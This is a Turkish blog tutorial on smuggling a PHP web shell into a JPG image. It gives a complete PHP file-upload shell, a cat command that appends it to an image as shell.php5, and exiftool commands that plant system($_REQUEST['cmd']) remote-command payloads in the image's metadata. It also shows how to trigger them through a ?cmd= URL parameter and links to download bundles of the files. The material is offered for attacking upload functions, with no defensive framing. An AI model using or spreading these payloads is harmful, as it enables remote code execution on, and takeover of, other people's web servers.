Kali Linux Cat ve Exiftool Kullanımı Rfi Cmd Shell

Kali Linux Cat ve Exiftool Kullanımı Rfi Cmd Shell

Öncelikle cat komutundan bahsedeyim kali linux cat komutu nedir? cat komutu debian tabanlı işletim sistemlerinde dosyaları birleştirmek için işe yarar bir komuttur ayrıca bir dizinden bir dizinin dosyasına bilgileri çekmek görüntülemek içinde kullanabilirsiniz.

Biz bu komutu farklı bir amaç için kullanacağız cat ile web shell.php dosyamızı bir jpg resim ile birleştireceğiz.

Masa üstüne bir tane shell.php dosyası ve bir tane de 1.jpg dosyası oluşturuyoruz

Örnek basit bir shell.php upload kodları

<html><title>Uploader</title>

<?php

echo '<b>CC2020CC<br> <br>'.php_uname().'<br></b>';

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

    if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Yüklendi</b><br><br>'; }

    else { echo '<b>Yüklenmedi</b><br><br>'; }

}

echo 'CC2020CC';

?>

</html>

Örnek bir resim

Linux Terminal komut işlemcisini Masaüstünde açıyoruz.

sudo cat 1.jpg shell.php > shell.php5

Masaüstünde shell.php5 adında bir dosya oluşacaktır,bu dosyayı web shell olarak kullanabilirsiniz.

Kali linux Exif tool kurulum ve kullanımı

Terminalde şu komutu yazalım.

sudo apt-get install exiftool

 

Daha sonra yukarıdaki 1.jpg troll kafayı Masaüstüne indirelim 

Masaüstünde bir terminal penceresi açalım

isterseniz Comment ister DocumentName olarak ekleyin size kalmış aşağıda her iki örneği de verdim.

exiftool -Comment="<?php if(isset($_REQUEST['cmd'])){system($_REQUEST['cmd']);}else{echo '<h1>RFI KOD</h1>';}__halt_compiler();?>" 1.jpg

 Veya

exiftool -DocumentName="<?php echo '<h1>RFI KOD</h1>'; if(isset(\$_REQUEST['cmd'])){echo '<pre>'; \$cmd=\$_REQUEST['cmd']; system(\$cmd); echo '</pre>'; } __halt_compiler(); ?>" 1.jpg

Çalışıp çalışmadığını anlamak için dosyayı yüklediğiniz dizine gidip dosya sonunda ?cmd=komut yazarak test edebilirsiniz.

Örnek:

https://falanfilan.com/upload/article/1.jpg?cmd=ls

Veya Tüm dosyaları ve komutları hazır indirin

https://www.dosyaupload.com/7pa6

Alternatif

https://yadi.sk/d/VHMHQl_M9G88LA

https://www.mediafire.com/file/hn9t35xo7230pmw/KaliDosyalarKomutlarExiftoolCat.zip